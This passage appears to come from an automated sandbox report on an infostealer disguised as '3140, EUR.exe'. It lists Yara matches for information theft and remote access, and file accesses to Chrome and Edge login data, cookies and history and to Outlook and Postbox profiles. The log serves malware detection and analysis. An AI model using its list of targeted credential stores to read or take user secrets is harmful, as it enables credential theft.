Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Users\user\Desktop\3140, EUR.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\3140, EUR.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\3140, EUR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 8.2.3140, EUR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4119574462.000000000043E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR